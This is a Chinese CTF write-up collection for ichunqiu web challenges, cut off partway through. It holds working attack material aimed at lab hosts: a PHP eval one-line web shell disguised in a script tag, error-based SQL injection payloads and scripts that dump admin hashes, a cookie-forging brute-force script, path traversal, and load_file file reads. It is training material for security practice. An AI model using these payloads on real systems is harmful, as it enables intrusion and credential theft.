           FLAG{GSOLPDMHCTMABCID}
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
             
            
            http://217046e1bac4484fa0f719b85c8b49b8aba97d6e26ba4c5b.changame.ichunqiu.com/u/test.txt
           
           
            
           
           
            
            
            
             
             
             
              
            
            
             
            
            
             
             
             
              上传成功后访问上传的文件，发现直接输出了:eval($_POST['a']) ?> 
            
            
             
            
            
             
              
             
             http://217046e1bac4484fa0f719b85c8b49b8aba97d6e26ba4c5b.changame.ichunqiu.com/u/test.php
            
            
             
            
            
             
             
             
              
              
              
               
             
             
              
             
             
              
               
              
              由此判断后台代码过滤了<?和php关键字
             
             
              
            
            
             
           
           
            
          
          
           
          
          
           
           
           
            这里通过<script >脚本的一句户后门绕过：
     
            <script language="pHp">@eval($_POST['sb'])</script> 
            
    
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
            
            
             
             
             
              
            
            
             
            
            
             
             
             
              
              
              
               
             
             
              
             
             
              
               
              
              最终flag:
             
             
              
             
             
              
               
              
              flag{d09c7fbb-b68c-4229-83bb-68c4864450c1}
             
             
              
            
            
             
           
           
            
          
          
           
          
          
           
            
           
           题目名称：Code
          
          
           
          
          
           
            
           
           题目writeup:
          
          
           
          
          
           
            
           
           打开url地址http://4c761be0a54f491c86c03f3ff1555b6d8645cd8e72d144ac.game.ichunqiu.com/index.php?jpg=hei.jpg，发现是一张图片
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
             
            
            查看网页源码，发现图片经过了base64编码，将其解码，解密发现是乱码，无果
           
           
            
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
           
           
            
             
            
            index.php?jpg=中的jpg参数猜测存在任意文件包含漏洞，这里包含index.php源码读出来，并查看源代码是base64
           
           
            
          
          
           
          
          
           
            
           
           http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/index.php?jpg=index.php
          
          
           
          
          
           
           
           
            
            
            
             
           
           
            
          
          
           
          
          
           
            
           
           得到的bae64:
          
          
           
          
          
           
           
           
            PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg==
    
            
            
            
             
             
             对其进行解密base64,得到：
            
            
            
            
            
            
             
             
             <?php
            
            
            
            
            
            
             
             
             /**
            
            
            
            
            
            
             
             
              * Created by PhpStorm.
            
            
            
            
            
            
             
             
              * Date: 2015/11/16
            
            
            
            
            
            
             
             
              * Time: 1:31
            
            
            
            
            
            
             
             
              */
            
            
            
            
            
            
             
             
             header('content-type:text/html;charset=utf-8');
            
            
            
            
            
            
             
             
             if(! isset($_GET['jpg']))
            
            
            
            
            
            
             
             
                 header('Refresh:0;url=./index.php?jpg=hei.jpg');
            
            
            
            
            
            
             
             
             $file = $_GET['jpg'];
            
            
            
            
            
            
             
             
             echo '<title>file:'.$file.'</title>';
            
            
            
            
            
            
             
             
             $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
            
            
            
            
            
            
             
             
             $file = str_replace("config","_", $file);
            
            
            
            
            
            
             
             
             $txt = base64_encode(file_get_contents($file));
            
            
            
            
            
            
             
             
             echo "<img src='data:image/gif;base64,".$txt."'></img>";
            
            
            
            
            
            
             
             
             /*
            
            
            
            
            
            
             
             
              * Can you find the flag file?
            
            
            
            
            
            
             
             
              *
            
            
            
            
            
            
             
             
              */
            
            
            
            
            
            
             
             
             ?>
            
            
            
            
            
            
             
             
             发现了Created by PhpStorm，phpstorm是php代码的集成开发环境，下载phpstorm，并新建一个项目，会发现在项目文件夹里面会生成一个.idea文件，它存储了项目的配置文件， 
             
             
             打开.idea文件可以发现misc.xml,modules.xml,workspace.xml文件。 
             
             
             由于刚才解码得到的php代码是在phpstorm中创建的，因此该项目文件一定会生成一个.idea文件。 
             
             
             访问地址： 
             
             
             http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/.idea/workspace.xml 
             
             
             
              
              
              
             
             
             
             
             
             打开发现xml文件中IDE生成有三个文件：x.php和config.php以及fl3g_ichuqiu.php 
             
             
             
              
              
              
             
             
             
             
             
             
              
              
              说明该项目生成了x.php，config.php，fl3g_ichuqiu.php文件.
             
             
             
             
             
             
              
              
              分别访问
              
              x.php，config.php，fl3g_ichuqiu.php文件
             
             
             
             
             
             
              
              
              其中x.php文件显示404页面不存在
             
             
             
             
             
             
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               config.php文件显示空白
              
              
              
              
              
              
               
               
               http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/config.php
              
              
              
             
             
             
             
             
             
              
              
              
             
             
             
             
             
             
              
              
              fl3g_ichuqiu.php显示一段符号
             
             
             
             
             
             
              
              
              http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/fl3g_ichuqiu.php
             
             
             
            
            
            
            
            
            
             
             
             
              
              
              
             
             
             
             
             
             
              
              
              那么flag很有可能在fl3g_ichuqiu.php中，这里通过index.php?jpg=
              
              fl3g_ichuqiu.php文件包含读取源码
             
             
             
             
             
             
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               查看源码：
              
              
              
             
             
             
             
             
             
              
              
              显示：<title>file:xfl3g_ichuqiu.php</title><img src='data:image/gif;base64,'></img>
             
             
             
             
             
             
              
              
              显然，base64编码内容被过滤了。
             
             
             
             
             
             
              
              
              我们自己改写一下index.php的代码，在本地环境中运行一下：
             
             
             
             
             
             
              
              
              <?php 
             
             
             
             
             
             
              
              
              $file = 'fl3g_ichuqiu.php'; 
             
             
             
             
             
             
              
              
              $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
             
             
             
             
             
             
              
              
              $file = str_replace("config","_", $file);
             
             
             
             
             
             
              
              
              echo $file; 
             
             
             
             
             
             
              
              
              输出结果为：fl3gichuqiu.php
             
             
             
             
             
             
              
              
              根据上面的正则替换：preg_replace，只要不是字母数字和.，就会被替换为空，因此_被替换成""了，但是我们有办法解决，
             
             
             
             
             
             
              
              
              利用index.php的substr函数即可，我们可以将fl3g_ichuqiu.php改写为fl3gconfigichuqiu.php，让后台脚本帮助我们替换。
             
             
             
             
             
             
              
              
              现在包含fl3gconfigichuqiu.php读取fl3g_ichuqiu.php的源码 
              http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php 
               
               
               
                
                
               
              
              查看源码，显示了base64编码的结果。 
               
               
               
                
                
               
              
               
               
              
               
                 得到的base64编码： 
               
              
               
               
              
               
                 PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHx8IH5FX05PVElDRSk7DQppbmNsdWRlKCdjb25maWcucGhwJyk7DQpmdW5jdGlvbiByYW5kb20oJGxlbmd0aCwgJGNoYXJzID0gJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6Jykgew0KICAgICRoYXNoID0gJyc7DQogICAgJG1heCA9IHN0cmxlbigkY2hhcnMpIC0gMTsNCiAgICBmb3IoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspCXsNCiAgICAgICAgJGhhc2ggLj0gJGNoYXJzW210X3JhbmQoMCwgJG1heCldOw0KICAgIH0NCiAgICByZXR1cm4gJGhhc2g7DQp9DQoNCmZ1bmN0aW9uIGVuY3J5cHQoJHR4dCwka2V5KXsNCiAgICBmb3IoJGk9MDskaTxzdHJsZW4oJHR4dCk7JGkrKyl7DQogICAgICAgICR0bXAgLj0gY2hyKG9yZCgkdHh0WyRpXSkrMTApOw0KICAgIH0NCiAgICAkdHh0ID0gJHRtcDsNCiAgICAkcm5kPXJhbmRvbSg0KTsNCiAgICAka2V5PW1kNSgkcm5kLiRrZXkpOw0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdHRtcCAuPSAkdHh0WyRpXSBeICRrZXlbKyskc107DQogICAgfQ0KICAgIHJldHVybiBiYXNlNjRfZW5jb2RlKCRybmQuJHR0bXApOw0KfQ0KZnVuY3Rpb24gZGVjcnlwdCgkdHh0LCRrZXkpew0KICAgICR0eHQ9YmFzZTY0X2RlY29kZSgkdHh0KTsNCiAgICAkcm5kID0gc3Vic3RyKCR0eHQsMCw0KTsNCiAgICAkdHh0ID0gc3Vic3RyKCR0eHQsNCk7DQogICAgJGtleT1tZDUoJHJuZC4ka2V5KTsNCg0KICAgICRzPTA7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCR0eHQpOyRpKyspew0KICAgICAgICBpZigkcyA9PSAzMikgJHMgPSAwOw0KICAgICAgICAkdG1wIC49ICR0eHRbJGldXiRrZXlbKyskc107DQogICAgfQ0KICAgIGZvcigkaT0wOyRpPHN0cmxlbigkdG1wKTskaSsrKXsNCiAgICAgICAgJHRtcDEgLj0gY2hyKG9yZCgkdG1wWyRpXSktMTApOw0KICAgIH0NCiAgICByZXR1cm4gJHRtcDE7DQp9DQokdXNlcm5hbWUgPSBkZWNyeXB0KCRfQ09PS0lFWyd1c2VyJ10sJGtleSk7DQppZiAoJHVzZXJuYW1lID09ICdzeXN0ZW0nKXsNCiAgICBlY2hvICRmbGFnOw0KfWVsc2V7DQogICAgc2V0Y29va2llKCd1c2VyJyxlbmNyeXB0KCdndWVzdCcsJGtleSkpOw0KICAgIGVjaG8gIuKVrijila/ilr3ilbAp4pWtIjsNCn0NCj8+ 
               
              
              将其进行解码得到一段php代码，是关于http cookie的加密与解密： 
              <?php 
              /** 
               * Created by PhpStorm. 
               * Date: 2015/11/16 
               * Time: 1:31 
               */ 
              error_reporting(E_ALL || ~E_NOTICE); 
              include('config.php'); 
              //获取length位数的随机字符串 
              function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') 
              {
               
                  $hash = ''; 
                  $max = strlen($chars) - 1; 
                  for($i = 0; $i < $length; $i++) {
               
                      $hash .= $chars[mt_rand(0, $max)]; 
                  } 
                  return $hash; 
              } 
              //加密过程，txt是明文，key是秘钥 
              function encrypt($txt,$key) 
              {
               
                  for($i=0;$i<strlen($txt);$i++){
               
                      $tmp .= chr(ord($txt[$i])+10); 
                  }//txt内容的ascii码增加10 
                  $txt = $tmp; 
                  $rnd=random(4); //取4位随机字符 
                  $key=md5($rnd.$key);//随机字符与秘钥进行拼接得到新的秘钥 
                  $s=0; 
                  for($i=0;$i<strlen($txt);$i++){
               
                      if($s == 32) $s = 0; 
                      $ttmp .= $txt[$i] ^ $key[++$s]; //将明文与key按位进行异或，key的长度最长为32 
                  } 
                  return base64_encode($rnd.$ttmp); //将随机字符与异或后的结果进行字符串拼接，然后进行base64加密，得到密文 
              } 
              //解密过程，txt是密文，key是秘钥 
              function decrypt($txt,$key){
               
                  $txt=base64_decode($txt); //将密文进行base64解码 
                  $rnd = substr($txt,0,4); //取出解码后的密文的前四位作为随机数字符串 
                  $txt = substr($txt,4); //从第5位开始的内容为真正的密文 
                  $key=md5($rnd.$key); //随机字符串与秘钥进行拼接得到新的秘钥 
                  $s=0; 
                  for($i=0;$i<strlen($txt);$i++){
               
                      if($s == 32) $s = 0; 
                      $tmp .= $txt[$i]^$key[++$s]; //将密文与秘钥进行异或得到tmp 
                  } 
                  for($i=0;$i<strlen($tmp);$i++){
               
                      $tmp1 .= chr(ord($tmp[$i])-10); //将tmp的ascii码减10得到明文 
                  } 
                  return $tmp1;  //明文 
              } 
              $username = decrypt($_COOKIE['user'],$key); //将HTTP Cookie方式传递的user变量作为密文，与秘钥进行解密 
              if ($username == 'system'){   //如果解密出的结果为system，则显示flag 
                  echo $flag; 
              }else{    //如果解密出的结果不是system，则向客户端发送一个http cookie，cookie名称为user变量，cookie的值为guest与秘钥加密的结果，并显示一个表情 
                  setcookie('user',encrypt('guest',$key)); 
                  echo "a??(a?ˉa??a?°)a?-"; 
              } 
              ?> 
              获取flag的思路：要获取flag就要获取key，使得key与$_COOKIE['user']的解密结果为system。 
              获取key的思路：通过浏览器向服务器请求“抱歉”表情界面的url，服务器就会向浏览器返回一个固定的cookie值， 
              即：encrypt('guest',$key)，则cookie值就是明文“guest”与key(5位)加密的结果(即guest与key异或得到cookie，那么guest与cookie异或可以得到key)。 
              得到5位的key后，可以爆破第六位的key，只要用得到的5位key连接上构造的第六位key,与“system”进行加密得到的user变量的cookie值去请求相应的url， 
              通过服务器反馈的内容含有“flag”关键字符，则说明构造的第六位key值正确，从而可以得到六位的key以及flag的内容。 
               
               
              
               
                 加密和解密的原理其实不难，需要与得到user的cookie计算解密 得到的key，然后利用这个key对system加密，从而得到system的cookie，伪造cookie得到flag. 
               
              
              根据代码原理，利用python脚本进行keys秘钥的爆破: 
              # _*_ coding: utf-8 _*
    
    import requests
    
    import string
    
    from base64 import *
    
    
    #返回“抱歉”表情的url
    
    url="http://2205aa80f72c42aa847d1bfa98b020901d84e5af62544db9.changame.ichunqiu.com/fl3g_ichuqiu.php"
    
    #请求该url，获取服务器返回的user变量的cookie值,即encrypt('guest',$key)
    
    cookie=requests.get(url).cookies['user']
    
    #将密文cookie进行base64解码
    
    txt=b64decode(cookie)
    
    rnd=txt[:4] #密文的前4位字符为随机字符
    
    ttmp=txt[4:]#ttmp为'guest'与key进行异或的密文值,ttmp与'guest'的位数一样，为5位
    
    keys=list('xxxxxx') #六位key的初始字符串
    
    guest=list('guest')#guest明文内容
    
    system=list('system')
    
    for i in range(len(guest)):
    
        guest[i]=chr(ord(guest[i])+10)#guest明文的ascii码加10，为guest加密做准备(encrypt('guest',$key))
    
    for i in range(len(guest)):
    
        keys[i]=chr(ord(ttmp[i])^ord(guest[i]))#ttmp为'guest'与key进行异或的密文值,则ttmp与guest异或为keys
    
    for i in range(len(system)):
    
        system[i]=chr(ord(system[i])+10)#system的ascii码加10，为system加密做准备
    
    letters='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'#第六位key的爆破字符
    
    ttmp_new='' #system与keys的异或值
    
    cookie_system=[]
    
    str=''
    
    for ch in letters:
    
        keys[5]=ch
    
        for i in range(len(system)):
    
            ttmp_new +=chr(ord(system[i])^ord(keys[i]))
    
        str=rnd+ttmp_new #随机字符与异或结果进行拼接
    
        cookie_system.append(b64encode(str)) #将拼接结果进行base64加密，得到flag界面的cookie值，并将其填充到字典cookie_system中
    
        ttmp_new=''#爆破一次，就将ttmp_new初始化一次
    
    #
    
    # print cookie_system #输出所有可能的key爆破得到的cookie值
    
    for i in cookie_system:
    
        cookies={'user':i} #cookie变量为user,值为i
    
        res=requests.get(url,cookies=cookies) #用所有的cookie值去尝试访问服务器，得到的反馈为res
    
        if 'flag' in res.content:#如果反馈的内容含有‘flag’关键字，则说明请求的cookie正确，即keys爆破成功
    
            #print  cookie_system[i] #输出正确的cookie值
    
            print res.content #输出服务器反馈的内容，即flag 
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               最终得到flag:
              
              
              
              
              
              
               
               
               flag{a543619a-eb42-489c-b6cd-700f9cbe4cb0}
              
              
              
              
              
              
               
               
               题目名称：YeserCMS
              
              
              
              
              
              
               
               
               题目内容： 
               
               
               新的CMS系统，帮忙测测是否有漏洞。tips:flag在网站根目录下的flag.php中 
               
               
               题目writeup: 
               
               
               打开链接发现其实是easycms，百度可以查到许多通用漏洞 
               
               
               http://f6434ae33e264d1786933d22e0f05e4caae7c61df2d24aa1.changame.ichunqiu.com/ 
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               访问/celive/live/header.php，直接进行报错注入
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 查询数据库 
               
               
               
               
                
                
                xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>  
               
               
               
               
                
                
                 
                
                查询表名  
               
               
               
               
                
                
                xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>  
               
               
               
               
                
                
                 
                
                这里出现了一个尴尬的问题，显示的长度不够了，通过调整1,32的来调整可显示部分表出来  
                
                得到部分表名：yesercms_a_attachment和yesercms_  
               
               
               
               
               
                
                 因为group_concat只取数据的32位，所以我们用python脚本跑一下，得到完整的数据库表： 
               
               
               
               
                
                
                import requests
    
    url = 'http://f6434ae33e264d1786933d22e0f05e4caae7c61df2d24aa1.changame.ichunqiu.com/celive/live/header.php'
    
    for i in range(1, 999, 31):
        postdata = {
                 
    
            'xajax': 'Postdata',
    
            'xajaxargs[0]': "<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),%s,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>" % str(
                i)
    
        }
    
        r = requests.post(url, data=postdata)
    
        print r.content[22:53]  
               
               
               
               
                
                
                 
                
                得到完整的表：  
               
               
               
               
               
                
                 yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yeercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_detail,yesercms_event,yesercms_friendlink,yesercms_guestbook,yesercms_linkword,yesercms_my_a,yesercms_my_yingpin,yesercms_operators,yesercms_option,yesercms_p_orders,yesercms_p_pay,yesercms_p_shipping,yesercms_pay_exchange,yesercms_sessions,yesercms_settings,yesercms_templatetag,yesercms_type,yesercms_union,yesercms_union_pay,yesercms_union_visit,yesercms_user,yesercms_usergroup 
               
               
               
               
               
                
                 查询字段： 
               
               
               
               
               
                
                 xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery> 
               
               
               
               
                
                
                 
                
                得到字段名：userid,username,password,nickna  
               
               
               
               
               
                
                 爆出字段内容： 
               
               
               
               
                
                
                xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx', (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>  
               
               
               
               
                
                
                 
                
                获得admin的用户MD5值为：ff512d4240cbbdeafada40467  
               
               
               
               
               
                
                 这里md5的长度也不够32位，还是需要调整，将起始位1修改为8。 
               
               
               
               
                
                
                xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx', (UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),8,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>  
               
               
               
               
                
                
                或者  
                
                xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,substring((SELECT/**/GROUP_CONCAT(username,password) from yesercms_user),10,50),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>  
                
                 
               
               
               
               
                
                
                拿到账号密码admin|ff512d4240cbbdeafada404677ccbe61,解密后得到明文：Yeser231  
                
                登陆成功后，在“管理-模板-当模板编辑”中存在文件读取漏洞  
                
                打开burpsuit，点击某一个档案的编辑按钮然后进行抓包  
                
                 
               
               
               
               
                
                
                 
               
               
              
              
              
              
              
              修改id的值，题目提示说flag在flag.php中，因为不知道在几级目录下，依次尝试  
              
              
              flag.php 
              
              
              ../flag.php 
              
              
              ../../flag.php 
              
              
              最后成功得到flag 
              
              
              POST /index.php?case=template&act=fetch&admin_dir=admin&site=defaul 
              
              
              data: 
              
              
              &id=../../flag.php 
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 最终flag: 
               
               
              
              
              
              
              
              
               
               
               flag{2d5d0894-8acc-44ce-b48a-280fb3fae9ab}
              
              
              
              
              
              题目名称：XSS平台 
              
              
              题目writeup: 
              
              
              启动题目场景，获得靶场网站，发现是一个xss平台 
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               输入用户名和密码，通过bupsuit抓包拦截发送请求，并测试sql注入无果
              
              
              
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               这里将post数据包中的pass这个参数后加入其它字符如[]，发送请求，发现在响应页面报错，并且显示为Rtiny python项目，且爆出网站的物理路径为：
              
              
              
              
              
              
               
               
               /var/www/html
              
              
              
              
              
              
               
               
               
              
              
              
              
              
              
               
               
               在github中搜索Rtiny,找到项目地址：
               
               
               https://github.com/r0ker/Rtiny-xss
              
              
              
              
              
              
               
               
               下载项目源码到本地，对其python 项目进行审计，发现lock.py文件中的代码是存在注入的，因为username和password参数都没有做过滤处理。
              
              
              
              
              
              
               
               
                
                
                 
               
               
              
              
              
              
              
              
               
               
               Username是来自cookie的加密发送，Tornado的set_secure_cookie()函数发送浏览器的cookies，以防范浏览器中的恶意修改。
              
              
              
              
              
              
               
               
               而这个cookie是被加密过的，加密使用的key在index.php文件中。cookie_secret的值为：M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 所以我们只需要将自己的注入语句，使用相同的s 
                ookie_secret值进行加密即可，并 
                使用报错注入构造注入语句，脚本如下： 
               
               
              
              
              
              
              
              
               
               
               import tornado.ioloop 
               
               
               import tornado.web 
               
               
                 
               
               
               settings = { 
               
               
                  "cookie_secret" : "M0ehO260Qm2dD/MQFYfczYpUbJoyrkp6qYoI2hRw2jc=", 
               
               
               } 
               
               
               
     
               
               
               class MainHandler(tornado.web.RequestHandler): 
               
               
                   def get(self): 
               
               
                       self.write("Hello") 
               
               
                       self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ") 
               
               
                       #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ") 
               
               
                       #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ") 
               
               
                       #self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),30,62))) -- ") 
               
               
                       #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select load_file('/var/www/html/f13g_ls_here.txt'))))#") 
               
               
                       #self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,mid((select load_file('/var/www/html/f13g_ls_here.txt')),28,60)))#") 
               
               
                       self.write(self.get_secure_cookie("username")) 
               
               
               
     
               
               
               def make_app(): 
               
               
                   return tornado.web.Application([ 
               
               
                       (r"/index", MainHandler), 
               
               
                       ], **settings) 
               
               
               
     
               
               
               if __name__ == "__main__": 
               
               
                   app = make_app() 
               
               
                   app.listen(8080) 
               
               
                   tornado.ioloop.IOLoop.instance().start() 
              
              
              
              
              
              
               
               
               脚本运行之后，
               
               使用火狐浏览器访问
               
               
               http://192.168.1.8:8080/index,并获取
               
               Set-Cookie值。
              
              
              
              
              
              
               
               
               下面为各个
               
               self.set_secure_cookie都执行一次，获得响应的Set-Cookie值
              
              
              
              
              
              
               
               
               然后访问lock路径，且替换cookie信息(不同报错SQL注入语句生成的cookie)，可获得不同的信息。
              
              
              
              
              
              
               
               
               获得数据库版本：
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select version()))) -- ")：
              
              
              
              
              
              
               
               
               Set-Cookie: username=2|1:0|10:1628698313|8:username|76:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCB2ZXJzaW9uKCkpKSkgLS0g|294ff6fda043eb8041e3ba94fe4677a85c6a5d9e4aeebb3790deccbe7d0e4009; expires=Fri, 10 Sep 2021 16:11:53 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 数据库版本为：5.5.50 
               
               
              
              
              
              
              
              
               
               
               获得表名：
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username", "' and extractvalue(1,concat(0x5c,(select group_concat(distinct table_name) from information_schema.tables where table_schema=database())))-- ")：
              
              
              
              
              
              
               
               
               Set-Cookie: username=2|1:0|10:1628698669|8:username|188:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQoZGlzdGluY3QgdGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpKSkpLS0g|fcf80f56b27a4c2c80ad3c569594a4823d2a510bfb29dd44262764c06a8589b0; expires=Fri, 10 Sep 2021 16:17:49 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 得到4个表： 
                host,manager,module,msglog,pro 
               
               
              
              
              
              
              
              
               
               
               获得字段名：
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='manager')))-- ")
              
              
              
              
              
              
               
               
               Set-Cookie: username=2|1:0|10:1628698796|8:username|224:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQoZGlzdGluY3QgY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWU9J21hbmFnZXInKSkpLS0g|049171c133846ce5524c3287cd499263ae26dc4588dab1b12fdb48467286e322; expires=Fri, 10 Sep 2021 16:19:56 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
               
                
                 得到3个字段名： 
                username,password,email 
               
               
              
              
              
              
              
              
               
               
               获得字段数据内容：
              
              
              
              
              
              
               
               
               self.set_secure_cookie("username","' and extractvalue(1,concat(0x5c,mid((select group_concat(username,'|',password,'|',email) from manager),30,62))) -- ")
              
              
              
              
              
              
               
               
               Set-Cookie: username=2|1:0|10:1628698884|8:username|156:JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4NWMsbWlkKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCd8JyxwYXNzd29yZCwnfCcsZW1haWwpIGZyb20gbWFuYWdlciksMzAsNjIpKSkgLS0g|d28589cae4f851cc8e55bee6e03ec08e76f96d4f839a1a4a35867e2af78b6c83; expires=Fri, 10 Sep 2021 16:21:24 GMT; Path=/
              
              
              
              
              
              
               
               
                
                
                 
               
               
               
               
                
                
